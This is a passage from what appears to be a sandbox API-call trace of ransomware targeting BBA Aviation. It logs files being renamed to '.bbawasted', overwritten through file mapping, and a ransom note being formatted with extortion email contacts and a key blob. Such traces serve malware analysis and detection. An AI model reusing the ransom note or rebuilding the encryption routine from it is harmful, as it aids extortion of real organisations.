dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.036] lstrcpyW (in: lpString1=0x5afc4e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.bbawasted")) returned 1 [0079.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.039] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0079.254] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0079.255] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0079.256] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0079.256] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0079.257] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0079.257] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0079.270] SetEndOfFile (hFile=0x11c) returned 1 [0079.272] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.272] CloseHandle (hObject=0x11c) returned 1 [0079.274] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0079.275] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0079.276] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0079.276] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0079.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x276) returned 0x5d0700 [0079.276] lstrcpyW (in: lpString1=0x5d076c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.276] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0079.277] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.277] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.278] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0079.279] SetEndOfFile (hFile=0x11c) returned 1 [0079.279] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.279] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.279] lstrcpyW (in: lpString1=0x5d076c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.bbawasted")) returned 1 [0079.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.280] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0079.389] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0079.390] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0079.390] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.390] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0079.391] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0079.391] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.402] SetEndOfFile (hFile=0x11c) returned 1 [0079.405] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.405] CloseHandle (hObject=0x11c) returned 1 [0079.409] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0079.409] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0079.410] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0079.410] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.410] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0079.410] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5afbd8 [0079.410] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.411] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.411] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0079.411] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.411] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.412] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0079.413] SetEndOfFile (hFile=0x11c) returned 1 [0079.413] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.413] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.413] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.bbawasted")) returned 1 [0079.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.414] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0079.498] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0079.499] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0079.499] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.499] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0079.505] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0079.505] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.513] SetEndOfFile (hFile=0x11c) returned 1 [0079.516] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.516] CloseHandle (hObject=0x11c) returned 1 [0079.518] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0079.518] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0079.519] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0079.519] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.519] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0079.519] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29e) returned 0x5d2990 [0079.519] lstrcpyW (in: lpString1=0x5d2a24, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.519] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.519] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0079.520] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.520] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.bbawasted_info" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.540] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0079.541] SetEndOfFile (hFile=0x11c) returned 1 [0079.542] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.542] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.542] lstrcpyW (in: lpString1=0x5d2a24, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.542] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.bbawasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.bbawasted")) returned 1 [0079.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.bbawasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.543] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0080.426] UnmapViewOfFile (lpBaseAddress=0x1390000) returned 1 [0080.535] CloseHandle (hObject=0xf8) returned 1 [0080.539] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5d2c38 [0080.539] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0080.569] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d2c80 | out: pbBuffer=0x5d2c80) returned 1 [0080.573] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0080.575] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0080.576] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0080.576] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0080.599] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x403) returned 0x5ba860 [0080.599] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c38 | out: hHeap=0x580000) returned 1 [0080.599] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0080.599] _snwprintf (in: _Dest=0x5c6ff0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m4BskcjNrVAuqL2XHUvrDzud2MzYHUZFYOCz56EUAa5+FtEI4AiiysKBPQm0Wm16\r\nqyZKZwu2qgwmZwI8Hrh3VHC9D2mVdIKHuJhUx9AHdxErJ2I8qwC1s5LpohErS7pq\r\nOWfw2sUAXKimkJUvAW3seg2aSwYMwDbYiYaVIqaQSymcYG8wkJSs9t7+LFIzNtdL\r\nzUydvszHdv68qOKffhYYCwA23JooOEbqrTpvr+2tnKUNkuUsfEHuwbkx4b3FxJko\r\ngIHFapoBo4XiVBuknp5OFc34khzOT2bvygSe7yRUZBVj0KzVP79R01cMapDB3wlu\r\n298p5XIBFZ/Q60b0zvXH/IXH8hlUATYPOCv/tKFFbOhe526sQaFK1Ob3n2d6bP6F\r\nXhe5eiYa6IQEMuU6BTqa0A3Yang6W6iA6i4iKEEvtkYbtKtyKXq65H5M+5OlABH0\r\nmw6Df0J8lsyExzsOLUZyPI8itxzlFXiBmYCSY6+YaAxASezhvaFCu1pAG9OdQx3v\r\n2NypP0VtBqv8pjibWOCe0mPO3iWVJPOSMBSKMaPyXZSVdYPrrEndBFkFroygQBdb\r\nsMccGL/b7pfOIzDXdOSL2o+BuR4Qlxmw/F2VK1S+BJDEqMcokSgWpoZCbXF9nc89\r\n/ipB++VjJqQB1L9a507a6acFu8QlaX4rS80bJuq4OT+=[end_key]\r\nKEEP IT\r\n") returned 984 [0080.599] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0080.599] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0xf9fe38, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe38*=0x7b0, lpOverlapped=0x0) returned 1 [0080.600] SetEndOfFile (hFile=0x11c) returned 1 [0080.602] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0080.602] CloseHandle (hObject=0x11c) returned 1 [0080.604] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0080.604] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5de388 | out: hHeap=0x580000) returned 1 [0080.604] SetEvent (hEvent=0xec) returned 1 [0080.604] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0xffffffff) returned 0x0 [0081.779] CloseHandle (hObject=0xf4) returned 1 [0081.779] CloseHandle (hObject=0xec) returned 1 [0081.779] CloseHandle (hObject=0x90) returned 1 [0081.779] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4790 | out: hHeap=0x580000) returned 1 [0081.779] _snprintf (in: _Dest=0xf9fee8, _Count=0x21, _Format="%u %u %u" | out: _Dest="320 316 4") returned 9 [0081.779] WriteFile (in: hFile=0xe8, lpBuffer=0xf9fee8*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0xf9ff7c, lpOverlapped=0x0 | out: lpBuffer=0xf9fee8*, lpNumberOfBytesWritten=0xf9ff7c*=0x9, lpOverlapped=0x0) returned 1 [0081.780] SetEndOfFile (hFile=0xe8) returned 1 [0081.782] CloseHandle (hObject=0xe8) returned 1 Thread: id = 324 os_tid = 0xa8c [0066.393] WaitForMultipleObjects (nCount=0x2, lpHandles=0x119ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0066.396] ResetEvent (hEvent=0xec) returned 1 [0066.396] _aulldvrm () returned 0x0 [0066.396] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0066.397] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0066.397] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.397] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0066.397] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5ba8c0 [0066.397] lstrcpyW (in: lpString1=0x5ba95e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0066.398] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bab70 [0066.398] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0066.398] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bab70 | out: pbBuffer=0x5bab70) returned 1 [0066.398] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.399] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0066.401] WriteFile (in: hFile=0x10c, lpBuffer=0x5bab70*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bab70*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0066.402] SetEndOfFile (hFile=0x10c) returned 1 [0066.403] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.403] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bab70 | out: hHeap=0x580000) returned 1 [0066.403] lstrcpyW (in: lpString1=0x5ba95e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0066.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.bbawasted")) returned 1 [0066.404] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0066.405] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0066.405] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x61d [0066.405] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d) returned 0x570000 [0066.405] CloseHandle (hObject=0x110) returned 1 [0066.409] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0066.409] CloseHandle (hObject=0x114) returned 1 [0066.409] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bac68 [0066.409] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0066.410] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bacb0 | out: pbBuffer=0x5bacb0) returned 1 [0066.410] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.410] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0066.411] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0066.411] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.439] SetEndOfFile (hFile=0x10c) returned 1 [0066.441] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bb280 | out: hHeap=0x580000) returned 1 [0066.441] CloseHandle (hObject=0x10c) returned 1 [0066.442] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba8c0 | out: hHeap=0x580000) returned 1 [0066.442] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a54b8 | out: hHeap=0x580000) returned 1 [0066.442] ResetEvent (hEvent=0xec) returned 1 [0066.968] _aulldvrm () returned 0x0 [0066.968] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0066.970] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0066.970] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.970] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0066.970] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5b9660 [0066.970] lstrcpyW (in: lpString1=0x5b96f8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0066.970] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b9910 [0066.970] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0066.971] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b9910 | out: pbBuffer=0x5b9910) returned 1 [0066.971] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0066.971] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 